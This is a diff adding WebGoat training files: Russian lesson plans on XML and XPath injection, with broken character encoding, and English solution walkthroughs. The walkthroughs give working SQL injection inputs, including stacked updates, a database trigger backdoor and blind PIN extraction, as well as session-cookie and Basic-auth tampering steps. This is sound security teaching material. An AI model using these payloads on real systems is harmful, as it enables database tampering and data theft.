+ĐĐ·Ńчите внимательно WSDL-файл WebGoat и попробŃйте полŃчить
+номера кредитных карт Đ´Ń€Ńгих пользователей. Обратите внимание на Ń‚Đľ, что вы не
+бŃдете видеть резŃльтат работы Ńервера на экране. Но как только вы ŃĐľŃтавите верный
+запроŃ, ŃŃ€Đ°Đ·Ń ŃоответŃтвŃющий ĐżŃнкт меню отметитŃŃŹ зелёной галочкой.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/XMLInjection.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/XMLInjection.html
new file mode 100644
index 000000000..814e18cdc
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/XMLInjection.html
@@ -0,0 +1,22 @@
+
+
Название Ńрока: Как выполняютŃŃŹ атаки клаŃŃĐ° 'XML-инъекция'.
+
Тема для изŃчения:
+На данном Ńроке вы наŃчитеŃŃŚ ĐľŃŃщеŃтвлять атаки клаŃŃĐ° 'XML-инъекция'
+
+
+Как работает данный вид атак:
+
+AJAX-приложения иŃпользŃŃŽŃ‚ XML для передачи данных на Ńервер. ĐŁŃедŃий XML может быть легко перехвачен
+и изменён злоŃĐĽŃ‹Ńленником.
+
ĐžŃновные цели:
+
+Đ’Ń‹ видите ŃпиŃок призов, которые можно полŃчить по программе 'WebGoat-Miles Reward Miles'.
+Когда вы введёте ID Ńвоего аккаŃнта приложение отобразит вам Đ˛Đ°Ń Đ±Đ°Đ»Đ°Đ˝Ń Đ¸ ŃпиŃок призов, которые
+вы можете заказать. Цель - заказать призы на которые Ń Đ˛Đ°Ń Đ˝Đµ хватает очков.
+ID ваŃего аккаŃнта 836239.
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/XPATHInjection.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/XPATHInjection.html
new file mode 100644
index 000000000..5d6f80ba2
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/XPATHInjection.html
@@ -0,0 +1,31 @@
+
+
Название Ńрока: ĐŃпользование XPATH-инъекций.
+
Тема для изŃчения:
+ ĐˇĐµĐąŃ‡Đ°Ń ĐĽŃ‹ раŃŃмотрим иŃпользование XPath-инъекций
+
+
+Как работает данный вид атак:
+
+По аналогии Ń SQL-инъекциями, XPath-инъекции возникают тогда, когда пользовательŃкие
+данные без должной проверки попадают в Đ·Đ°ĐżŃ€ĐľŃ Đş XML-данным. ПоŃылая приложению
+Ńпецильно Ńформированные запроŃŃ‹ злоŃĐĽŃ‹Ńленник может раŃкрыть внŃтреннюю ŃŃ‚Ń€ŃктŃŃ€Ń
+XML-базы и полŃчить Đ´ĐľŃŃ‚ŃĐż Đş той информации, Đş которой ĐµĐĽŃ ĐľĐ±Ń€Đ°Ń‰Đ°Ń‚ŃŚŃŃŹ нельзя.
+Например он может повыŃить Ńвои привилегии еŃли ĐµĐĽŃ ŃĐ´Đ°ŃŃ‚ŃŃŹ
+произвеŃти XPath-инъекцию в отноŃении файла хранящего пользовательŃкие аккаŃнты.
+
+ЗапроŃŃ‹ Đş XML ĐľŃŃщеŃтвляютŃŃŹ Ń ĐżĐľĐĽĐľŃ‰ŃŚŃŽ XPath - не Ńложного языка, позволяющего
+определять меŃтонахождения информации в XML-ŃŃ‚Ń€ŃктŃре. Как и в SQL, в нём вы можете
+ŃŃтанавливать критерии поиŃка. Đ’ ŃĐ»Ńчаях когда данные приложения хранятŃŃŹ в виде XML-базы,
+пользователь Ń ĐżĐľĐĽĐľŃ‰ŃŚŃŽ одного или неŃкольких параметров запроŃĐ° может определять что из неё бŃдет
+извлечено и отображено на Ńайте. Đти параметры должны тщательно проверятьŃŃŹ, чтоб Đ°Ń‚Đ°ĐşŃющий
+не Ńмог изменить ŃŃ‚Ń€ŃктŃŃ€Ń Đ¸Đ·Đ˝Đ°Ń‡Đ°Đ»ŃŚĐ˝ĐľĐłĐľ XPath-запроŃĐ° и извлечь чŃвŃтвительнŃŃŽ информацию.
+
+
ĐžŃновные цели:
+
+Форма ниже позволяет работникам Ńмотреть их перŃональнŃŃŽ информацию включая данные
+Đľ зарплате. Đ’Đ°Ń Đ°ĐşĐşĐ°Ńнт - Mike/test123. Цель - проŃмотреть данные Đ´Ń€Ńгих работников.
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/AccessControlMatrix.html b/webgoat-5.4/src/main/webapp/lesson_solutions/AccessControlMatrix.html
new file mode 100644
index 000000000..ab0e18e3c
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/AccessControlMatrix.html
@@ -0,0 +1,707 @@
+
+
+
+
+
+
Lesson
+Plan Title: Using an
+Access Control Matrix
+
+
+
+
Concept /
+Topic To Teach:
+
+
+
+
In a
+role-based access control scheme, a role represents a set of access permissions
+and privileges. A user can be assigned one or more roles. A role-based access
+control scheme normally consists of two parts: role permission management and
+role assignment. A broken role-based access control scheme might allow a user
+to perform accesses that are not allowed by his/her assigned roles, or somehow
+allow privilege escalation to an unauthorized role.
+
+
+
+
General
+Goal(s):
+
+
Each user is
+a member of a role that is allowed to access only certain resources. Your goal
+is to explore the access control rules that govern this site. Only the [Admin]
+group should have access to the 'Account Manager' resource.
+
+
+
+
Solution :
+
+
+
+
This exercise
+is straightforward. You need to find a user where you can access a resource
+that you shouldn't be able to access.
+
+
After a few attempts
+you will learn that Larry can access resources of the role Account Manager.
+
+
+
+
+
+
Figure 1 Lesson 9
+
+
+
+
+
+
Figure 2 Lesson 9 Completed
+
+
+
+
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/AccessControlMatrix_files/Thumbs.db b/webgoat-5.4/src/main/webapp/lesson_solutions/AccessControlMatrix_files/Thumbs.db
new file mode 100644
index 000000000..b269eb3f5
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/AccessControlMatrix_files/Thumbs.db differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/AccessControlMatrix_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/AccessControlMatrix_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/AccessControlMatrix_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image001.png
new file mode 100644
index 000000000..ebb3f8cb8
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image002.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image002.jpg
new file mode 100644
index 000000000..eca131d99
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image002.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image003.png
new file mode 100644
index 000000000..5efe24680
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image004.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image004.jpg
new file mode 100644
index 000000000..64245b784
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image004.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/AccessControlMatrix_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/AccessControlMatrix_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/AccessControlMatrix_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors.html b/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors.html
new file mode 100644
index 000000000..3a999c080
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors.html
@@ -0,0 +1,841 @@
+
+
+
+
+
+
Lesson
+Plan Title: How to
+Create Database Back Door Attacks.
+
+
+
+
Concept /
+Topic To Teach:
+
+
How to Create
+Database Back Door Attacks.
+
+
+
+
How the
+attacks works:
+
+
Databases are
+used usually as a backend for web applications. Also it is used as a media of
+storage. It can also be used as a place to store a malicious activity such as a
+trigger. A trigger is called by the database management system upon the
+execution of another database operation like insert, select, update or delete.
+An attacker for example can create a trigger that would set his email address
+instead of every new user's email address.
+
+
+
+
General
+Goal(s):
+
+
Your
+goal should be to learn how you can exploit a vulnerable query to create a
+trigger.
+
+
+
+
+
+
Figure 1 Database backdoor
+
+
+
+
Solution:
+
+
Enter your user ID 101 to see how the application works.
+
+
+
+
+
+
Figure 2 User ID is 101
+
+
+
+
As you
+probably noticed, the input is not validated so very easy to do SQL Injection.
+To have two SQL queries executed, you need to separate them using a sem-colon.
+For example select * from employees; drop table employees will first select all
+the users from employees and then drop the table employees. Not all databases
+support multiple SQL statements.
+
+
+
+
Here you need
+to update the salary of the employees. This requires an update query like
+update employees set salary=10000.
+
+
+
+
Inject this
+for the user ID: 101; update employee set salary=10000
+
+
+
+
+
+
Figure 3 Update query
+
+
+
+
+
+
Figure 4 Stage 1 completed
+
+
+
+
To create a
+database trigger, you need to inject the following SQL: CREATE TRIGGER
+myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET
+email='john@hackme.com'WHERE userid = NEW.userid
+
+
+
+
+
+
Figure 5 Insert trigger
+
+
+
+
+
+
Figure 6 Lesson completed
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image001.png
new file mode 100644
index 000000000..5a4d94ac7
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image003.png
new file mode 100644
index 000000000..8150275d8
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image005.png b/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image005.png
new file mode 100644
index 000000000..62ebf88f6
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image005.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image007.png b/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image007.png
new file mode 100644
index 000000000..9960dbc61
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image007.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image009.png b/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image009.png
new file mode 100644
index 000000000..be39f6ac3
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image009.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image011.png b/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image011.png
new file mode 100644
index 000000000..ef6e16606
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image011.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image013.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image013.jpg
new file mode 100644
index 000000000..c25f12992
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image013.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image014.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image014.jpg
new file mode 100644
index 000000000..08f893f3d
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image014.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image015.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image015.jpg
new file mode 100644
index 000000000..08c662842
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image015.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image016.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image016.jpg
new file mode 100644
index 000000000..9299a4a2f
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image016.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image017.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image017.jpg
new file mode 100644
index 000000000..49760e726
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image017.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image018.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image018.jpg
new file mode 100644
index 000000000..735ea196b
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/image018.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BackDoors_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication.html b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication.html
new file mode 100644
index 000000000..5d888cf5f
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication.html
@@ -0,0 +1,933 @@
+
+
+
+Basic Authentication
+
+
+
Lesson
+Plan Title: Basic
+Authentication
+
+
+
+
Concept /
+Topic To Teach:
+
+
Basic
+Authentication is used to protect server side resources. The web server will send
+a 401 authentication request with the response for the requested resource. The
+client side browser will then prompt the user for a user name and password
+using a browser supplied dialog box. The browser will base64 encode the user
+name and password and send those credentials back to the web server. The web
+server will then validate the credentials and return the requested resource if
+the credentials are correct.
+
+
These
+credentials are automatically resent for each page protected with this
+mechanism without requiring the user to enter their credentials again.
+
+
+
+
General
+Goal(s):
+
+
For this
+lesson, your goal is to understand Basic Authentication and answer the
+questions below.
+
+
+
+
+
+
Figure 1 Lesson 13
+
+
+
+
To learn the
+name of the authentication header you must click “Submit” and intercept the
+request with WebScarab.
+
+
+
+
+
+
Figure 2 Intercepted request
+
+
+
+
The HTTP
+header that contains the Basic Authentication information is called
+"Authorization". This value Z3Vlc3Q6Z3Vlc3Q= is Base64 encoded. You can decode
+this by using WebScarab > Tools > Transcoder.
+
+
+
+
+
+
Figure 3 WebScarabs Transcoder
+
+
+
+
Click Base64
+decode.
+
+
+
+
+
+
Figure 4 Decode value
+
+
+
+
These values must
+be used to complete the questions.
+
+
+
+
+
+
Figure 5 Answers
+
+
+
+
+
+
+
+
Figure 6 Part 1 completed
+
+
+
+
For this
+lesson it is very important that you understand how the JSESSIONID cookie is
+used for session management and how the basic authorization header is used for
+authentication.
+
+
+
+
+
+
When WebGoat
+is able to retrieve a valid session you are automatically redirected to the
+lesson you are working on. When there is no valid session, WebGoat will create
+a new JSESSIONID and you will see the first lesson, HTTP Basics.
+
+
+
+
When there is
+no session cookie, WebGoat will first verify if you already authenticated. If
+not, you will get a pop-up window from the browser that requests your user name
+and password (guest/guest). After the user credentials are validated, you will
+access the Start-page of WebGoat and WebGoat will create a new JSESSIONID for
+this session.
+
+
+
+
To access
+WebGoat as the user basic, you need to corrupt the existing JSESSIONID and the
+Authorization header. You can do this in WebScarab. Intercept the request and
+delete a character from the JSESSIONID value and the Authorization header.
+
+
WebGoat will
+require you to authenticate, so you now enter for the user name basic and for
+the password basic. This logs you on as the user basic.
+
+
+
+
Remember our
+JSESSIONID? This JSESSIONID is a non-persistent cookie which is set during our
+first visit. Every request from the browser to WebGoat will have this cookie
+value. Corrupting this value in the previous request will not change the cookie
+value stored in browser memory and that is the reason why the old JSESSIONID
+cookie is sent in every request.
+
+
+
+
+
+
Figure 7 Basic Authentication
+
+
+
+
You clearly
+see that the JSESSIONID is the same like in the previous request, but the
+Authorization header now contains the Base 64 encoded value of basic:basic (you
+can decode this value in WebScarab > Tools > Transcoder).
+
+
+
+
Figure 8 Logged on as user basic
+
+
+
+
+
+
Because of the
+valid JSESSIONID, WebGoat retrieves the authenticated user via the server-side
+session object using getSession().getUser(). To make WebGoat believe that you
+are authenticated as basic, you need to corrupt the JSESSIONID, as shown in the
+screenshot below.
+
+
+
+
+
+
Figure 9 Corrupt JSESSIONID
+
+
+
+
+
+
+
+
Figure 10 Start page for user basic
+
+
+
+
Now you are
+redirected to the WebGoat start page. The JSESSIONID is changed and you lost all
+your green stars because the basic user hasn’t completed any lesson. Go to the
+lesson "Basic Authentication" to complete this lesson.
+
+
+
+
+
+
Figure 11 Lesson 13 Completed
+
+
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image001.png
new file mode 100644
index 000000000..58cb8db49
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image003.png
new file mode 100644
index 000000000..e7380275b
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image005.png b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image005.png
new file mode 100644
index 000000000..6984b9e74
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image005.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image007.png b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image007.png
new file mode 100644
index 000000000..bebf90cda
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image007.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image009.png b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image009.png
new file mode 100644
index 000000000..917746bad
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image009.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image011.png b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image011.png
new file mode 100644
index 000000000..05f16f195
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image011.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image013.png b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image013.png
new file mode 100644
index 000000000..f66852324
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image013.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image015.png b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image015.png
new file mode 100644
index 000000000..d167a7f35
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image015.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image017.png b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image017.png
new file mode 100644
index 000000000..9139ad257
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image017.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image019.png b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image019.png
new file mode 100644
index 000000000..f8604adae
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image019.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image021.png b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image021.png
new file mode 100644
index 000000000..5788c8d43
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image021.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image023.png b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image023.png
new file mode 100644
index 000000000..368d0d456
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image023.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image025.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image025.jpg
new file mode 100644
index 000000000..b1aeffb19
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image025.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image026.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image026.jpg
new file mode 100644
index 000000000..8addcb872
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image026.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image027.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image027.jpg
new file mode 100644
index 000000000..0245a850c
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image027.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image028.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image028.jpg
new file mode 100644
index 000000000..9e6b65ff8
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image028.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image029.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image029.jpg
new file mode 100644
index 000000000..3586cede5
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image029.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image030.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image030.jpg
new file mode 100644
index 000000000..cdc430d9b
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image030.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image031.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image031.jpg
new file mode 100644
index 000000000..e9bb7a278
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image031.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image032.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image032.jpg
new file mode 100644
index 000000000..b4e1f851a
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image032.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image033.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image033.jpg
new file mode 100644
index 000000000..468293b14
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image033.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image034.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image034.jpg
new file mode 100644
index 000000000..3a463c317
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image034.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image035.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image035.jpg
new file mode 100644
index 000000000..32f9278c2
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image035.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image036.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image036.jpg
new file mode 100644
index 000000000..1ab696dcd
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/image036.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/BasicAuthentication_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BlindNumericSqlInjection.html b/webgoat-5.4/src/main/webapp/lesson_solutions/BlindNumericSqlInjection.html
new file mode 100644
index 000000000..45eb33e58
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/BlindNumericSqlInjection.html
@@ -0,0 +1,46 @@
+
+
+
+Solution: Blind Numeric SQL Injection
+Lesson Plan Title: Blind Numeric SQL Injection
+
+Concept / Topic To Teach:
+
+General Goal(s):
+
+Solution: accountNumber ;101 AND 1=1 and 101 AND 1=2 101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 10000 ); 2364 . Enter this number to complete the lesson.
+
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/BlindStringSqlInjection.htmlSOLBAK b/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/BlindStringSqlInjection.htmlSOLBAK
new file mode 100644
index 000000000..5ad40b6cd
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/BlindSqlInjection_files/BlindStringSqlInjection.htmlSOLBAK
@@ -0,0 +1,904 @@
+
+
+
+
+
+
+
+
Lesson Plan Title: How to Perform Blind SQL Injection
+
+
+
+
Concept / Topic To Teach:
+
+
SQL injection
+attacks represent a serious threat to any database-driven site. The methods behind
+an attack are easy to learn and the damage caused can range from considerable
+to complete system compromise. Despite these risks an incredible number of
+systems on the internet are susceptible to this form of attack.
+
+
+
+
Not only is
+it a threat easily instigated, it is also a threat that, with a little
+common-sense and forethought, can be almost totally prevented. This lesson will
+show the student several examples of SQL injection.
+
+
+
+
It is always
+good practice to sanitize all input data, especially data that will used in OS
+command, scripts, and database queries.
+
+
+
+
General Goal(s):
+
+
The user
+should be able to view all records in the specified table. The user could add new records or modify
+existing records.
+
+
+
+
From the hints J
+
+
Compound SQL
+statements can be made by joining multiple tests with keywords like AND and OR.
+Create a SQL statement that you can use as a true/false test and then select
+the first character of the target element and do a start narrowing down the
+character using > and <
+
+
+
+
The backend
+database is HSQLDB. Keep that in mind if you research SQL functions
+on the Internet since different databases use some different functions and
+syntax.
+
+
This is the
+code for the query being built and issued by WebGoat:
+
+
+
+
"SELECT
+* FROM user_data WHERE userid = " + accountNumber
+
+
The
+application is taking your input and inserting it at the end of a pre-formed
+SQL command. You will need to make use of the following SQL functions:
+
+
+
+
SELECT -
+query for your target data and get a string
+
+
+
+
substr(string,
+start, length) - returns a substring of string starting at the start character
+and going for length characters
+
+
+
+
ascii(string)
+will return the ascii value of the first character in string
+
+
+
+
> and <
+- once you have a character's value, compare it to a choosen one
+
+
Example: is
+the first character of the first_name of userid 15613 less than 'M' (ascii 77)?
+
+
+
+
+
101 AND (ascii(
